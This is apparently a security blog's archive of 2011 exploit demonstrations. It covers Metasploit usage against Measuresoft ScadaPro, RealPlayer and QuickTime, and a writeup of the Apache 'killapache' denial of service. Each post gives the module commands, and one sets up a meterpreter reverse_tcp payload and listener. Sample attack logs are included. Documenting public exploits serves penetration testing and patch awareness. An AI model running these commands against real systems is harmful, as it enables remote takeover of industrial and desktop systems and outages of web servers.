Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

EBD-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability the 2011-09-13
Metasploit PoC provided the 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro before version 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the ‘xf’ command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-01
Coordinated public release of the vulnerability the 2011-08-16
Metasploit PoC provided the 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3192 : Apache HTTPD Killer Remote Denial of Service

Exploits

Kingcope has release, the 19 August, on Full disclosure mailing-list a perl script named “killapache.pl” how can cause to Apache HTTPD Web server a remote denial of service (DoS). The DoS could be done by the attacker with a low requirement of ressources (CPU, memory and bandwidth) causing the targeted Web server to consume a big amount of ressources (CPU and memory). Apache HTTPD 2.0 and 2.2 series are affected by this vulnerability. This vulnerability in Apache HTTPD was previously discovered by Michal Zalewski in January 2007. Apache Foundation propose mitigation possibilities, until the release of a patch.

Execution of “killapache.pl” script on the attacker box.

Attacker box consumed ressources after “killapache.pl” execution.

Target server consumed ressources after “killapache.pl” execution.

In the target server Apache HTTPD logs, you can see these logs.

xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 345 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"

The script send HTTP HEAD method, but the DoS will also work with GET or POST requests.